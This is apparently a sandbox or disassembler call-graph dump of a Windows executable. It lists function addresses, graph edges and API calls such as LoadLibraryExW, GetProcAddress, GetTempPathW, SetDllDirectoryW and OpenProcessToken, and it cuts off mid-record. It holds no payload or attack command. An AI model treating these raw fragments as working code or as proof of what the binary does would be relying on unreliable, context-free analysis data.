_get_daylight 11 API calls 18675->18677 18678 7ff6404f43f4 _get_daylight 11 API calls 18676->18678 18682 7ff6404f4f86 18677->18682 18679 7ff6404f4f90 18678->18679 18679->18666 18680 7ff6404f43f4 _get_daylight 11 API calls 18679->18680 18681 7ff6404f4f9a 18680->18681 18683 7ff6404f7118 45 API calls 18681->18683 18682->18666 18684 7ff6404f4fd4 GetDriveTypeW 18682->18684 18683->18682 18684->18666 18687 7ff6404f4cfc 18685->18687 18686 7ff6404f4a2d 18695 7ff6404f4e10 18686->18695 18687->18686 18709 7ff6404fea34 18687->18709 18689 7ff6404f4d90 18689->18686 18690 7ff6404fea34 51 API calls 18689->18690 18691 7ff6404f4da3 18690->18691 18691->18686 18692 7ff6404fea34 51 API calls 18691->18692 18693 7ff6404f4db6 18692->18693 18693->18686 18694 7ff6404fea34 51 API calls 18693->18694 18694->18686 18696 7ff6404f4e2a 18695->18696 18697 7ff6404f4e61 18696->18697 18698 7ff6404f4e3a 18696->18698 18699 7ff6404fe8c8 21 API calls 18697->18699 18700 7ff6404f4e4a 18698->18700 18701 7ff6404f4368 _fread_nolock 11 API calls 18698->18701 18699->18700 18700->18637 18701->18700 18703 7ff6404f4c50 18702->18703 18704 7ff6404f4c5d FileTimeToSystemTime 18702->18704 18703->18704 18706 7ff6404f4c58 18703->18706 18705 7ff6404f4c71 SystemTimeToTzSpecificLocalTime 18704->18705 18704->18706 18705->18706 18707 7ff6404eb870 _log10_special 8 API calls 18706->18707 18708 7ff6404f4b49 18707->18708 18708->18659 18710 7ff6404fea41 18709->18710 18713 7ff6404fea65 18709->18713 18711 7ff6404fea46 18710->18711 18710->18713 18714 7ff6404f43f4 _get_daylight 11 API calls 18711->18714 18712 7ff6404fea9f 18715 7ff6404f43f4 _get_daylight 11 API calls 18712->18715 18713->18712 18716 7ff6404feabe 18713->18716 18717 7ff6404fea4b 18714->18717 18718 7ff6404feaa4 18715->18718 18719 7ff6404f4178 45 API calls 18716->18719 18720 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18717->18720 18721 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 18718->18721 18724 7ff6404feacb 18719->18724 18722 7ff6404fea56 18720->18722 18723 7ff6404feaaf 18721->18723 18722->18689 18723->18689 18724->18723 18725 7ff6404ff7ec 51 API calls 18724->18725 18725->18724 19272 7ff6404ebe70 19273 7ff6404ebe80 19272->19273 19289 7ff6404f8ec0 19273->19289 19275 7ff6404ebe8c 19295 7ff6404ec168 19275->19295 19277 7ff6404ec44c 7 API calls 19280 7ff6404ebf25 19277->19280 19278 7ff6404ebea4 _RTC_Initialize 19287 7ff6404ebef9 19278->19287 19300 7ff6404ec318 19278->19300 19281 7ff6404ebeb9 19303 7ff6404f832c 19281->19303 19287->19277 19288 7ff6404ebf15 19287->19288 19290 7ff6404f8ed1 19289->19290 19291 7ff6404f8ed9 19290->19291 19292 7ff6404f43f4 _get_daylight 11 API calls 19290->19292 19291->19275 19293 7ff6404f8ee8 19292->19293 19294 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 19293->19294 19294->19291 19296 7ff6404ec179 19295->19296 19299 7ff6404ec17e __scrt_acquire_startup_lock 19295->19299 19297 7ff6404ec44c 7 API calls 19296->19297 19296->19299 19298 7ff6404ec1f2 19297->19298 19299->19278 19328 7ff6404ec2dc 19300->19328 19302 7ff6404ec321 19302->19281 19304 7ff6404f834c 19303->19304 19305 7ff6404ebec5 19303->19305 19306 7ff6404f8354 19304->19306 19307 7ff6404f836a GetModuleFileNameW 19304->19307 19305->19287 19327 7ff6404ec3ec InitializeSListHead 19305->19327 19308 7ff6404f43f4 _get_daylight 11 API calls 19306->19308 19311 7ff6404f8395 19307->19311 19309 7ff6404f8359 19308->19309 19310 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 19309->19310 19310->19305 19312 7ff6404f82cc 11 API calls 19311->19312 19313 7ff6404f83d5 19312->19313 19314 7ff6404f83dd 19313->19314 19318 7ff6404f83f5 19313->19318 19315 7ff6404f43f4 _get_daylight 11 API calls 19314->19315 19316 7ff6404f83e2 19315->19316 19317 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19316->19317 19317->19305 19319 7ff6404f8417 19318->19319 19321 7ff6404f8443 19318->19321 19322 7ff6404f845c 19318->19322 19320 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19319->19320 19320->19305 19323 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19321->19323 19325 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19322->19325 19324 7ff6404f844c 19323->19324 19326 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19324->19326 19325->19319 19326->19305 19329 7ff6404ec2ef 19328->19329 19330 7ff6404ec2f6 19328->19330 19329->19302 19332 7ff6404f94fc 19330->19332 19335 7ff6404f9138 19332->19335 19342 7ff6404ff5e8 EnterCriticalSection 19335->19342 19410 7ff6404f9060 19413 7ff6404f8fe4 19410->19413 19420 7ff6404ff5e8 EnterCriticalSection 19413->19420 19832 7ff6404fa2e0 19833 7ff6404fa2e5 19832->19833 19834 7ff6404fa2fa 19832->19834 19838 7ff6404fa300 19833->19838 19839 7ff6404fa342 19838->19839 19840 7ff6404fa34a 19838->19840 19841 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19839->19841 19842 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19840->19842 19841->19840 19843 7ff6404fa357 19842->19843 19844 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19843->19844 19845 7ff6404fa364 19844->19845 19846 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19845->19846 19847 7ff6404fa371 19846->19847 19848 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19847->19848 19849 7ff6404fa37e 19848->19849 19850 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19849->19850 19851 7ff6404fa38b 19850->19851 19852 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19851->19852 19853 7ff6404fa398 19852->19853 19854 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19853->19854 19855 7ff6404fa3a5 19854->19855 19856 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19855->19856 19857 7ff6404fa3b5 19856->19857 19858 7ff6404f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19857->19858 19859 7ff6404fa3c5 19858->19859 19864 7ff6404fa1a4 19859->19864 19878 7ff6404ff5e8 EnterCriticalSection 19864->19878 17186 7ff6404ebf5c 17207 7ff6404ec12c 17186->17207 17189 7ff6404ec0a8 17334 7ff6404ec44c IsProcessorFeaturePresent 17189->17334 17190 7ff6404ebf78 __scrt_acquire_startup_lock 17192 7ff6404ec0b2 17190->17192 17197 7ff6404ebf96 __scrt_release_startup_lock 17190->17197 17193 7ff6404ec44c 7 API calls 17192->17193 17195 7ff6404ec0bd __FrameHandler3::FrameUnwindToEmptyState 17193->17195 17194 7ff6404ebfbb 17196 7ff6404ec041 17213 7ff6404ec594 17196->17213 17197->17194 17197->17196 17323 7ff6404f8e44 17197->17323 17199 7ff6404ec046 17216 7ff6404e1000 17199->17216 17204 7ff6404ec069 17204->17195 17330 7ff6404ec2b0 17204->17330 17208 7ff6404ec134 17207->17208 17209 7ff6404ec140 __scrt_dllmain_crt_thread_attach 17208->17209 17210 7ff6404ebf70 17209->17210 17211 7ff6404ec14d 17209->17211 17210->17189 17210->17190 17211->17210 17341 7ff6404ecba8 17211->17341 17368 7ff6405097e0 17213->17368 17215 7ff6404ec5ab GetStartupInfoW 17215->17199 17217 7ff6404e1009 17216->17217 17370 7ff6404f4794 17217->17370 17219 7ff6404e352b 17377 7ff6404e33e0 17219->17377 17222 7ff6404e3538 17225 7ff6404eb870 _log10_special 8 API calls 17222->17225 17226 7ff6404e372a 17225->17226 17328 7ff6404ec5d8 GetModuleHandleW 17226->17328 17227 7ff6404e356c 17230 7ff6404e1bf0 49 API calls 17227->17230 17228 7ff6404e3736 17229 7ff6404e3f70 108 API calls 17228->17229 17231 7ff6404e3746 17229->17231 17246 7ff6404e3588 17230->17246 17232 7ff6404e3785 17231->17232 17470 7ff6404e76a0 17231->17470 17234 7ff6404e25f0 53 API calls 17232->17234 17234->17222 17236 7ff6404e3778 17238 7ff6404e379f 17236->17238 17239 7ff6404e377d 17236->17239 17237 7ff6404e365f __vcrt_freefls 17240 7ff6404e3844 17237->17240 17243 7ff6404e7e10 14 API calls 17237->17243 17242 7ff6404e1bf0 49 API calls 17238->17242 17241 7ff6404ef36c 74 API calls 17239->17241 17528 7ff6404e3e90 17240->17528 17241->17232 17245 7ff6404e37be 17242->17245 17247 7ff6404e36ae 17243->17247 17252 7ff6404e18f0 115 API calls 17245->17252 17439 7ff6404e7e10 17246->17439 17465 7ff6404e7f80 17247->17465 17248 7ff6404e3852 17250 7ff6404e3865 17248->17250 17251 7ff6404e3871 17248->17251 17531 7ff6404e3fe0 17250->17531 17255 7ff6404e1bf0 49 API calls 17251->17255 17256 7ff6404e37df 17252->17256 17253 7ff6404e36bd 17257 7ff6404e380f 17253->17257 17259 7ff6404e36cf 17253->17259 17270 7ff6404e3805 __vcrt_freefls 17255->17270 17256->17246 17258 7ff6404e37ef 17256->17258 17479 7ff6404e8400 17257->17479 17262 7ff6404e25f0 53 API calls 17258->17262 17263 7ff6404e1bf0 49 API calls 17259->17263 17261 7ff6404e86b0 2 API calls 17265 7ff6404e389e SetDllDirectoryW 17261->17265 17262->17222 17266 7ff6404e36f1 17263->17266 17269 7ff6404e38c3 17265->17269 17266->17270 17271 7ff6404e36fc 17266->17271 17274 7ff6404e3a50 17269->17274 17534 7ff6404e6560 17269->17534 17270->17261 17276 7ff6404e25f0 53 API calls 17271->17276 17278 7ff6404e3a5a PostMessageW GetMessageW 17274->17278 17279 7ff6404e3a7d 17274->17279 17276->17222 17278->17279 17452 7ff6404e3080 17279->17452 17281 7ff6404e38ea 17283 7ff6404e3947 17281->17283 17285 7ff6404e3901 17281->17285 17554 7ff6404e65a0 17281->17554 17283->17274 17290 7ff6404e395c 17283->17290 17297 7ff6404e3905 17285->17297 17575 7ff6404e6970 17285->17575 17609 7ff6404e30e0 17290->17609 17292 7ff6404e6780 FreeLibrary 17295 7ff6404e3aa3 17292->17295 17297->17283 17591 7ff6404e2870 17297->17591 17299 7ff6404e396c 17628 7ff6404e83e0 LocalFree 17299->17628 17324 7ff6404f8e7c 17323->17324 17325 7ff6404f8e5b 17323->17325 18556 7ff6404f96e8 17324->18556 17325->17196 17329 7ff6404ec5e9 17328->17329 17329->17204 17331 7ff6404ec2c1 17330->17331 17332 7ff6404ec080 17331->17332 17333 7ff6404ecba8 7 API calls 17331->17333 17332->17194 17333->17332 17335 7ff6404ec472 _isindst memcpy_s 17334->17335 17336 7ff6404ec491 RtlCaptureContext RtlLookupFunctionEntry 17335->17336 17337 7ff6404ec4ba RtlVirtualUnwind 17336->17337 17338 7ff6404ec4f6 memcpy_s 17336->17338 17337->17338 17339 7ff6404ec528 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17338->17339 17340 7ff6404ec576 _isindst 17339->17340 17340->17192 17342 7ff6404ecbb0 17341->17342 17343 7ff6404ecbba 17341->17343 17347 7ff6404ecf44 17342->17347 17343->17210 17348 7ff6404ecf53 17347->17348 17350 7ff6404ecbb5 17347->17350 17355 7ff6404ed180 17348->17355 17351 7ff6404ecfb0 17350->17351 17352 7ff6404ecfdb 17351->17352 17353 7ff6404ecfbe DeleteCriticalSection 17352->17353 17354 7ff6404ecfdf 17352->17354 17353->17352 17354->17343 17359 7ff6404ecfe8 17355->17359 17365 7ff6404ed0d2 TlsFree 17359->17365 17366 7ff6404ed02c __vcrt_InitializeCriticalSectionEx 17359->17366 17360 7ff6404ed05a LoadLibraryExW 17362 7ff6404ed07b GetLastError 17360->17362 17363 7ff6404ed0f9 17360->17363 17361 7ff6404ed119 GetProcAddress 17361->17365 17362->17366 17363->17361 17364 7ff6404ed110 FreeLibrary 17363->17364 17364->17361 17366->17360 17366->17361 17366->17365 17367 7ff6404ed09d LoadLibraryExW 17366->17367 17367->17363 17367->17366 17369 7ff6405097d0 17368->17369 17369->17215 17369->17369 17373 7ff6404fe790 17370->17373 17371 7ff6404fe7e3 17372 7ff6404f9b24 _invalid_parameter_noinfo 37 API calls 17371->17372 17376 7ff6404fe80c 17372->17376 17373->17371 17374 7ff6404fe836 17373->17374 17629 7ff6404fe668 17374->17629 17376->17219 17378 7ff6404ebb70 17377->17378 17379 7ff6404e33ec GetModuleFileNameW 17378->17379 17380 7ff6404e341b 17379->17380 17381 7ff6404e3438 17379->17381 17642 7ff6404e29e0 17380->17642 17637 7ff6404e85a0 FindFirstFileExW 17381->17637 17385 7ff6404e34a5 17661 7ff6404e8760 17385->17661 17386 7ff6404e344b 17652 7ff6404e8620 CreateFileW 17386->17652 17388 7ff6404eb870 _log10_special 8 API calls 17391 7ff6404e34dd 17388->17391 17390 7ff6404e34b3 17393 7ff6404e342e 17390->17393 17396 7ff6404e26c0 49 API calls 17390->17396 17391->17222 17399 7ff6404e18f0 17391->17399 17393->17388 17394 7ff6404e3474 __vcrt_InitializeCriticalSectionEx 17394->17385 17395 7ff6404e345c 17655 7ff6404e26c0 17395->17655 17396->17393 17400 7ff6404e3f70 108 API calls 17399->17400 17401 7ff6404e1925 17400->17401 17402 7ff6404e1bb6 17401->17402 17404 7ff6404e76a0 83 API calls 17401->17404 17403 7ff6404eb870 _log10_special 8 API calls 17402->17403 17405 7ff6404e1bd1 17403->17405 17406 7ff6404e196b 17404->17406 17405->17227 17405->17228 17408 7ff6404ef9f4 73 API calls 17406->17408 17438 7ff6404e199c 17406->17438 17407 7ff6404ef36c 74 API calls 17407->17402 17409 7ff6404e1985 17408->17409 17410 7ff6404e19a1 17409->17410 17411 7ff6404e1989 17409->17411 17413 7ff6404ef6bc _fread_nolock 53 API calls 17410->17413 17412 7ff6404e2760 53 API calls 17411->17412 17412->17438 17414 7ff6404e19b9 17413->17414 17415 7ff6404e19bf 17414->17415 17416 7ff6404e19d7 17414->17416 17417 7ff6404e2760 53 API calls 17415->17417 17418 7ff6404e19ee 17416->17418 17419 7ff6404e1a06 17416->17419 17417->17438 17421 7ff6404e2760 53 API calls 17418->17421 17420 7ff6404e1bf0 49 API calls 17419->17420 17422 7ff6404e1a1d 17420->17422 17421->17438 17423 7ff6404e1bf0 49 API calls 17422->17423 17424 7ff6404e1a68 17423->17424 17425 7ff6404ef9f4 73 API calls 17424->17425 17426 7ff6404e1a8c 17425->17426 17427 7ff6404e1aa1 17426->17427 17428 7ff6404e1ab9 17426->17428 17429 7ff6404e2760 53 API calls 17427->17429 17430 7ff6404ef6bc _fread_nolock 53 API calls 17428->17430 17429->17438 17431 7ff6404e1ace 17430->17431 17432 7ff6404e1ad4 17431->17432 17433 7ff6404e1aec 17431->17433 17435 7ff6404e2760 53 API calls 17432->17435 17670 7ff6404ef430 17433->17670 17435->17438 17437 7ff6404e25f0 53 API calls 17437->17438 17438->17407 17440 7ff6404e7e1a 17439->17440 17441 7ff6404e86b0 2 API calls 17440->17441 17442 7ff6404e7e39 GetEnvironmentVariableW 17441->17442 17443 7ff6404e7ea2 17442->17443 17444 7ff6404e7e56 ExpandEnvironmentStringsW 17442->17444 17445 7ff6404eb870 _log10_special 8 API calls 17443->17445 17444->17443 17446 7ff6404e7e78 17444->17446 17448 7ff6404e7eb4 17445->17448 17447 7ff6404e8760 2 API calls 17446->17447 17449 7ff6404e7e8a 17447->17449 17448->17237 17450 7ff6404eb870 _log10_special 8 API calls 17449->17450 17451 7ff6404e7e9a 17450->17451 17451->17237 17676 7ff6404e5af0 17452->17676 17456 7ff6404e30a1 17460 7ff6404e30b9 17456->17460 17746 7ff6404e5800 17456->17746 17458 7ff6404e30ad 17458->17460 17755 7ff6404e5990 17458->17755 17461 7ff6404e33a0 17460->17461 17462 7ff6404e33ae 17461->17462 17463 7ff6404e33bf 17462->17463 17974 7ff6404e8180 FreeLibrary 17462->17974 17463->17292 17466 7ff6404e86b0 2 API calls 17465->17466 17467 7ff6404e7f94 17466->17467 17975 7ff6404f7548 17467->17975 17469 7ff6404e7fa6 __vcrt_freefls 17469->17253 17471 7ff6404e76c4 17470->17471 17472 7ff6404e779b __vcrt_freefls 17471->17472 17473 7ff6404ef9f4 73 API calls 17471->17473 17472->17236 17474 7ff6404e76e0 17473->17474 17474->17472 17993 7ff6404f6bd8 17474->17993 17476 7ff6404ef9f4 73 API calls 17477 7ff6404e76f5 17476->17477 17477->17472 17477->17476 17478 7ff6404ef6bc _fread_nolock 53 API calls 17477->17478 17478->17477 17480 7ff6404e8415 17479->17480 18008 7ff6404e7b50 GetCurrentProcess OpenProcessToken 17480->18008 17483 7ff6404e7b50 7 API calls 17484 7ff6404e8441 17483->17484 17485 7ff6404e8474 17484->17485 17486 7ff6404e845a 17484->17486 17488 7ff6404e2590 48 API calls 17485->17488 17487 7ff6404e2590 48 API calls 17486->17487 17489 7ff6404e8472 17487->17489 17490 7ff6404e8487 LocalFree LocalFree 17488->17490 17489->17490 17491 7ff6404e84a3 17490->17491 17494 7ff6404e84af 17490->17494 18018 7ff6404e2940 17491->18018 17493 7ff6404eb870 _log10_special 8 API calls 17495 7ff6404e3814 17493->17495 17494->17493 17496 7ff6404e7c40 17495->17496 17497 7ff6404e7c58 17496->17497 17498 7ff6404e7cda GetTempPathW 17497->17498 17500 7ff6404e7e10 14 API calls 17497->17500 17499 7ff6404e7cef 17498->17499 17502 7ff6404e2530 48 API calls 17499->17502 17501 7ff6404e7c88 17500->17501 18024 7ff6404e77d0 17501->18024 17511 7ff6404e7d08 __vcrt_freefls 17502->17511 17506 7ff6404f7548 38 API calls 17508 7ff6404e7cae __vcrt_freefls 17506->17508 17508->17498 17515 7ff6404e7cbc 17508->17515 17509 7ff6404e7cc8 __vcrt_freefls 17513 7ff6404eb870 _log10_special 8 API calls 17509->17513 17518 7ff6404e7d45 __vcrt_freefls 17511->17518 18056 7ff6404f7e80 17511->18056 17514 7ff6404e3834 17513->17514 17514->17240 17514->17270 17517 7ff6404e26c0 49 API calls 17515->17517 17517->17509 17518->17509 17520 7ff6404e86b0 2 API calls 17518->17520 17521 7ff6404e7d91 17520->17521 17522 7ff6404e7d96 17521->17522 17523 7ff6404e7dc9 17521->17523 17524 7ff6404e86b0 2 API calls 17522->17524 17525 7ff6404f7548 38 API calls 17523->17525 17526 7ff6404e7da6 17524->17526 17525->17509 17527 7ff6404f7548 38 API calls 17526->17527 17527->17509 17529 7ff6404e1bf0 49 API calls 17528->17529 17530 7ff6404e3ead 17529->17530 17530->17248 17532 7ff6404e1bf0 49 API calls 17531->17532 17533 7ff6404e4010 17532->17533 17533->17270 17535 7ff6404e6575 17534->17535 17536 7ff6404e38d5 17535->17536 17537 7ff6404e2760 53 API calls 17535->17537 17538 7ff6404e6b00 17536->17538 17537->17536 17539 7ff6404e6b30 17538->17539 17552 7ff6404e6b4a __vcrt_freefls 17538->17552 17540 7ff6404e1440 116 API calls 17539->17540 17539->17552 17541 7ff6404e6b54 17540->17541 17542 7ff6404e3fe0 49 API calls 17541->17542 17541->17552 17543 7ff6404e6b76 17542->17543 17544 7ff6404e6b7b 17543->17544 17545 7ff6404e3fe0 49 API calls 17543->17545 17546 7ff6404e2870 53 API calls 17544->17546 17547 7ff6404e6b9a 17545->17547 17546->17552 17547->17544 17548 7ff6404e3fe0 49 API calls 17547->17548 17549 7ff6404e6bb6 17548->17549 17549->17544 17550 7ff6404e6bbf 17549->17550 17551 7ff6404e25f0 53 API calls 17550->17551 17553 7ff6404e6c2f memcpy_s __vcrt_freefls 17550->17553 17551->17552 17552->17281 17553->17281 17558 7ff6404e65bc 17554->17558 17555 7ff6404eb870 _log10_special 8 API calls 17556 7ff6404e66f1 17555->17556 17556->17285 17559 7ff6404e675d 17558->17559 17560 7ff6404e1bf0 49 API calls 17558->17560 17562 7ff6404e674a 17558->17562 17564 7ff6404e3f10 10 API calls 17558->17564 17565 7ff6404e66df 17558->17565 17566 7ff6404e670d 17558->17566 17569 7ff6404e2870 53 API calls 17558->17569 17570 7ff6404e6737 17558->17570 17573 7ff6404e6720 17558->17573 18274 7ff6404e17e0 17558->18274 18278 7ff6404e7530 17558->18278 18289 7ff6404e15c0 17558->18289 17561 7ff6404e25f0 53 API calls 17559->17561 17560->17558 17561->17565 17563 7ff6404e25f0 53 API calls 17562->17563 17563->17565 17564->17558 17565->17555 17568 7ff6404e25f0 53 API calls 17566->17568 17568->17565 17569->17558 17572 7ff6404e25f0 53 API calls 17570->17572 17572->17565 17574 7ff6404e25f0 53 API calls 17573->17574 17574->17565 17576 7ff6404e81a0 3 API calls 17575->17576 17577 7ff6404e6989 17576->17577 17578 7ff6404e81a0 3 API calls 17577->17578 17579 7ff6404e699c 17578->17579 17580 7ff6404e69cf 17579->17580 17581 7ff6404e69b4 17579->17581 17582 7ff6404e25f0 53 API calls 17580->17582 18381 7ff6404e6ea0 GetProcAddress 17581->18381 17584 7ff6404e3916 17582->17584 17584->17297 17585 7ff6404e6cd0 17584->17585 17586 7ff6404e6ced 17585->17586 17587 7ff6404e6d58 17586->17587 17588 7ff6404e25f0 53 API calls 17586->17588 17587->17297 17589 7ff6404e6d40 17588->17589 17590 7ff6404e6780 FreeLibrary 17589->17590 17590->17587 17592 7ff6404e28aa 17591->17592 17593 7ff6404f3ca4 49 API calls 17592->17593 17594 7ff6404e28d2 17593->17594 17595 7ff6404e86b0 2 API calls 17594->17595 17596 7ff6404e28ea 17595->17596 17597 7ff6404e290e MessageBoxA 17596->17597 17598 7ff6404e28f7 MessageBoxW 17596->17598 17599 7ff6404e2920 17597->17599 17598->17599 17600 7ff6404eb870 _log10_special 8 API calls 17599->17600 17601 7ff6404e2930 17600->17601 17602 7ff6404e6780 17601->17602 17603 7ff6404e68d6 17602->17603 17608 7ff6404e6792 17602->17608 17603->17283 17604 7ff6404e68aa 17606 7ff6404e68c2 17604->17606 18445 7ff6404e8180 FreeLibrary 17604->18445 17606->17283 17608->17604 18444 7ff6404e8180 FreeLibrary 17608->18444 17621 7ff6404e30ee memcpy_s 17609->17621 17610 7ff6404eb870 _log10_special 8 API calls 17612 7ff6404e338e 17610->17612 17611 7ff6404e32e7 17611->17610 17612->17222 17612->17299 17614 7ff6404e1bf0 49 API calls 17614->17621 17615 7ff6404e3309 17617 7ff6404e25f0 53 API calls 17615->17617 17616 7ff6404e3f10 10 API calls 17616->17621 17617->17611 17618 7ff6404e7530 52 API calls 17618->17621 17620 7ff6404e32e9 17623 7ff6404e25f0 53 API calls 17620->17623 17621->17611 17621->17614 17621->17615 17621->17616 17621->17618 17621->17620 17622 7ff6404e2870 53 API calls 17621->17622 17625 7ff6404e15c0 118 API calls 17621->17625 17626 7ff6404e32f7 17621->17626 18446 7ff6404e68e0 17621->18446 18450 7ff6404e3b40 17621->18450 18494 7ff6404e3e00 17621->18494 17622->17621 17623->17611 17625->17621 17627 7ff6404e25f0 53 API calls 17626->17627 17627->17611 17636 7ff6404f477c EnterCriticalSection 17629->17636 17638 7ff6404e85df FindClose 17637->17638 17639 7ff6404e85f2 17637->17639 17638->17639 17640 7ff6404eb870 _log10_special 8 API calls 17639->17640 17641 7ff6404e3442 17640->17641 17641->17385 17641->17386 17643 7ff6404ebb70 17642->17643 17644 7ff6404e29fc GetLastError 17643->17644 17645 7ff6404e2a29 17644->17645 17646 7ff6404f3ef8 48 API calls 17645->17646 17647 7ff6404e2a54 FormatMessageW 17646->17647 17666 7ff6404e2590 17647->17666 17650 7ff6404eb870 _log10_special 8 API calls 17651 7ff6404e2ae5 17650->17651 17651->17393 17653 7ff6404e8660 GetFinalPathNameByHandleW CloseHandle 17652->17653 17654 7ff6404e3458 17652->17654 17653->17654 17654->17394 17654->17395 17656 7ff6404e26fa 17655->17656 17657 7ff6404f3ef8 48 API calls 17656->17657 17658 7ff6404e2722 MessageBoxW 17657->17658 17659 7ff6404eb870 _log10_special 8 API calls 17658->17659 17660 7ff6404e274c 17659->17660 17660->17393 17662 7ff6404e878a WideCharToMultiByte 17661->17662 17663 7ff6404e87b5 17661->17663 17662->17663 17665 7ff6404e87cb __vcrt_freefls 17662->17665 17664 7ff6404e87d2 WideCharToMultiByte 17663->17664 17663->17665 17664->17665 17665->17390 17667 7ff6404e25b5 17666->17667 17668 7ff6404f3ef8 48 API calls 17667->17668 17669 7ff6404e25d8 MessageBoxW 17668->17669 17669->17650 17671 7ff6404e1b06 17670->17671 17672 7ff6404ef439 17670->17672 17671->17437 17671->17438 17673 7ff6404f43f4 _get_daylight 11 API calls 17672->17673 17674 7ff6404ef43e 17673->17674 17675 7ff6404f9bf0 _invalid_parameter_noinfo 37 API calls 17674->17675 17675->17671 17677 7ff6404e5b05 17676->17677 17678 7ff6404e1bf0 49 API calls 17677->17678 17679 7ff6404e5b41 17678->17679 17680 7ff6404e5b4a 17679->17680 17681 7ff6404e5b6d 17679->17681 17683 7ff6404e25f0 53 API calls 17680->17683 17682 7ff6404e3fe0 49 API calls 17681->17682 17684 7ff6404e5b85 17682->17684 17699 7ff6404e5b63 17683->17699 17685 7ff6404e5ba3 17684->17685 17686 7ff6404e25f0 53 API calls 17684->17686 17761 7ff6404e3f10 17685->17761 17686->17685 17688 7ff6404eb870 _log10_special 8 API calls 17690 7ff6404e308e 17688->17690 17690->17460 17707 7ff6404e5c80 17690->17707 17691 7ff6404e5bbb 17693 7ff6404e3fe0 49 API calls 17691->17693 17692 7ff6404e81a0 3 API calls 17692->17691 17694 7ff6404e5bd4 17693->17694 17695 7ff6404e5bf9 17694->17695 17696 7ff6404e5bd9 17694->17696 17767 7ff6404e81a0 17695->17767 17698 7ff6404e25f0 53 API calls 17696->17698 17698->17699 17699->17688 17700 7ff6404e5c06 17701 7ff6404e5c12 17700->17701 17702 7ff6404e5c49 17700->17702 17703 7ff6404e86b0 2 API calls 17701->17703 17771 7ff6404e50b0 GetProcAddress 17702->17771 17705 7ff6404e5c2a 17703->17705 17706 7ff6404e29e0 51 API calls 17705->17706 17706->17699 17856 7ff6404e4c80 17707->17856 17709 7ff6404e5cba 17710 7ff6404e5cd3 17709->17710 17711 7ff6404e5cc2 17709->17711 17863 7ff6404e4450 17710->17863 17712 7ff6404e25f0 53 API calls 17711->17712 17718 7ff6404e5cce 17712->17718 17715 7ff6404e5cdf 17717 7ff6404e25f0 53 API calls 17715->17717 17716 7ff6404e5cf0 17719 7ff6404e5cff 17716->17719 17720 7ff6404e5d10 17716->17720 17717->17718 17718->17456 17721 7ff6404e25f0 53 API calls 17719->17721 17867 7ff6404e4700 17720->17867 17721->17718 17723 7ff6404e5d2b 17724 7ff6404e5d2f 17723->17724 17725 7ff6404e5d40 17723->17725 17726 7ff6404e25f0 53 API calls 17724->17726 17727 7ff6404e5d4f 17725->17727 17728 7ff6404e5d60 17725->17728 17726->17718 17729 7ff6404e25f0 53 API calls 17727->17729 17874 7ff6404e45a0 17728->17874 17729->17718 17747 7ff6404e5820 17746->17747 17747->17747 17748 7ff6404e5849 17747->17748 17754 7ff6404e5860 __vcrt_freefls 17747->17754 17749 7ff6404e25f0 53 API calls 17748->17749 17750 7ff6404e5855 17749->17750 17750->17458 17751 7ff6404e596b 17751->17458 17752 7ff6404e1440 116 API calls 17752->17754 17753 7ff6404e25f0 53 API calls 17753->17754 17754->17751 17754->17752 17754->17753 17756 7ff6404e5ab7 17755->17756 17759 7ff6404e59c6 17755->17759 17756->17460 17757 7ff6404e5ad2 17758 7ff6404e25f0 53 API calls 17757->17758 17758->17756 17759->17756 17759->17757 17760 7ff6404e25f0 53 API calls 17759->17760 17760->17759 17762 7ff6404e3f1a 17761->17762 17763 7ff6404e86b0 2 API calls 17762->17763 17764 7ff6404e3f3f 17763->17764 17765 7ff6404eb870 _log10_special 8 API calls 17764->17765 17766 7ff6404e3f67 17765->17766 17766->17691 17766->17692 17768 7ff6404e86b0 2 API calls 17767->17768 17769 7ff6404e81b4 LoadLibraryExW 17768->17769 17770 7ff6404e81d3 __vcrt_freefls 17769->17770 17770->17700 17772 7ff6404e50f7 GetProcAddress 17771->17772 17776 7ff6404e50d2 17771->17776 17773 7ff6404e511c GetProcAddress 17772->17773 17772->17776 17775 7ff6404e5141 GetProcAddress 17773->17775 17773->17776 17774 7ff6404e29e0 51 API calls 17777 7ff6404e50ec 17774->17777 17775->17776 17778 7ff6404e5169 GetProcAddress 17775->17778 17776->17774 17777->17699 17778->17776 17779 7ff6404e5191 GetProcAddress 17778->17779 17779->17776 17780 7ff6404e51b9 GetProcAddress 17779->17780 17781 7ff6404e51d5 17780->17781 17782 7ff6404e51e1 GetProcAddress 17780->17782 17781->17782 17859 7ff6404e4cac 17856->17859 17857 7ff6404e4cb4 17857->17709 17858 7ff6404e4e54 17860 7ff6404e5017 __vcrt_freefls 17858->17860 17861 7ff6404e4180 47 API calls 17858->17861 17859->17857 17859->17858 17894 7ff6404f5db4 17859->17894 17860->17709 17861->17858 17864 7ff6404e4480 17863->17864 17865 7ff6404eb870 _log10_special 8 API calls 17864->17865 17866 7ff6404e44ea 17865->17866 17866->17715 17866->17716 17868 7ff6404e476f 17867->17868 17871 7ff6404e471b 17867->17871 17869 7ff6404e4300 2 API calls 17868->17869 17870 7ff6404e477c 17869->17870 17870->17723 17873 7ff6404e475a 17871->17873 17952 7ff6404e4300 17871->17952 17873->17723 17875 7ff6404e45b5 17874->17875 17876 